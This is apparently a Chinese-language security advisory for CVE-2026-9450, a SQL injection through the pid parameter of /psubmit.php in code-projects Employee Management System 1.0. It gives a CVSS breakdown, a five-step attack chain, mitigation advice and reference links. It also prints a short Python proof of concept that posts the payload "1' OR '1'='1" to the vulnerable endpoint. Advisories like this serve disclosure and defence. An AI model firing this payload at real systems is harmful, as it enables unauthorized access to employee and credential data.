CVE-2026-9450 CVSS 6.3 中危

CVE-2026-9450 Employee Management System SQL注入漏洞

披露日期: 2026-05-25

来源: [email protected]

漏洞信息

漏洞编号

CVE-2026-9450

漏洞类型

SQL注入

CVSS评分

6.3 中危

攻击向量

网络 (AV:N)

认证要求

低权限 (PR:L)

用户交互

无需交互 (UI:N)

影响产品

code-projects Employee Management System

漏洞概述

code-projects Employee Management System 1.0版本存在安全漏洞。该漏洞源于/psubmit.php文件中对参数pid的处理不当，导致存在SQL注入漏洞。攻击者无需经过高权限认证即可远程发起攻击，通过操纵pid参数注入恶意SQL代码，进而可能获取敏感数据库信息、修改数据或破坏系统完整性。目前该漏洞利用代码已公开，建议尽快修复。

技术细节

该漏洞位于code-projects Employee Management System 1.0版本的/psubmit.php文件中。根本原因是应用程序在接收用户输入时，对“pid”参数缺乏有效的输入验证和过滤机制，导致其被直接拼接至后端SQL查询语句中执行。攻击者可利用这一SQL注入缺陷，通过构造恶意的HTTP请求，将特定的SQL代码注入到后端数据库引擎中解析执行。根据CVSS 3.1评分向量，该漏洞具有网络攻击面（AV:N）、低攻击复杂度（AC:L）且需要低权限用户（PR:L）。攻击者无需诱导用户交互（UI:N）即可远程发起攻击。利用方式通常包括基于联合查询的注入以提取敏感数据，或利用布尔盲注和时间盲注获取数据库结构。成功利用该漏洞可能导致数据库中的机密信息泄露（如管理员密码、员工薪资），甚至导致数据被篡改或删除，严重影响系统的机密性、完整性和可用性。

攻击链分析

STEP 1

侦察

攻击者识别目标服务器运行的是code-projects Employee Management System 1.0版本，并定位到/psubmit.php接口。

STEP 2

武器化

攻击者编写针对pid参数的SQL注入Payload，例如使用UNION SELECT语句尝试提取数据库信息。

STEP 3

投递

攻击者向目标服务器发送包含恶意pid参数的HTTP POST请求至/psubmit.php。

STEP 4

利用

后端数据库解析并执行了注入的恶意SQL语句，返回敏感数据或执行非预期操作。

STEP 5

影响

攻击者成功获取数据库权限，导致数据泄露、完整性受损或可用性下降。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import requests

def exploit_sqli(target_url):
    # Vulnerable parameter: pid
    # Vulnerable file: /psubmit.php
    payload = {
        "pid": "1' OR '1'='1" # Basic PoC payload to test vulnerability
    }
    
    try:
        response = requests.post(target_url + "/psubmit.php", data=payload)
        if response.status_code == 200:
            print("[+] Request sent successfully.")
            print("[+] Check the response for potential data leakage or behavior changes.")
            print("Response:", response.text[:200])
        else:
            print("[-] Exploit failed.")
    except Exception as e:
        print(f"Error: {e}")

if __name__ == "__main__":
    target = "http://localhost" # Replace with actual target
    exploit_sqli(target)

影响范围

code-projects Employee Management System 1.0

防御指南

临时缓解措施

在官方修复补丁发布前，建议在WAF层添加针对/psubmit.php接口及pid参数的严格过滤规则，阻断包含单引号、UNION、SELECT等SQL关键字的请求。同时，应暂时限制外部网络对该系统的直接访问，或通过VPN仅允许内网可信IP访问管理后台。

参考链接

1 CVE https://www.cve.org/CVERecord?id=CVE-2026-9450
2 NVD https://nvd.nist.gov/vuln/detail/CVE-2026-9450
3 Details https://www.cvedetails.com/cve/CVE-2026-9450/
4 VulDB https://vuldb.com/cve/CVE-2026-9450
5 Link https://code-projects.org/
6 Link https://github.com/zzzxc643/CVE1/blob/main/EMPLOYEE_MANAGEMENT_SYSTEM/vul22.md
7 Link https://vuldb.com/submit/813706
8 Link https://vuldb.com/vuln/365431
9 Link https://vuldb.com/vuln/365431/cti

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表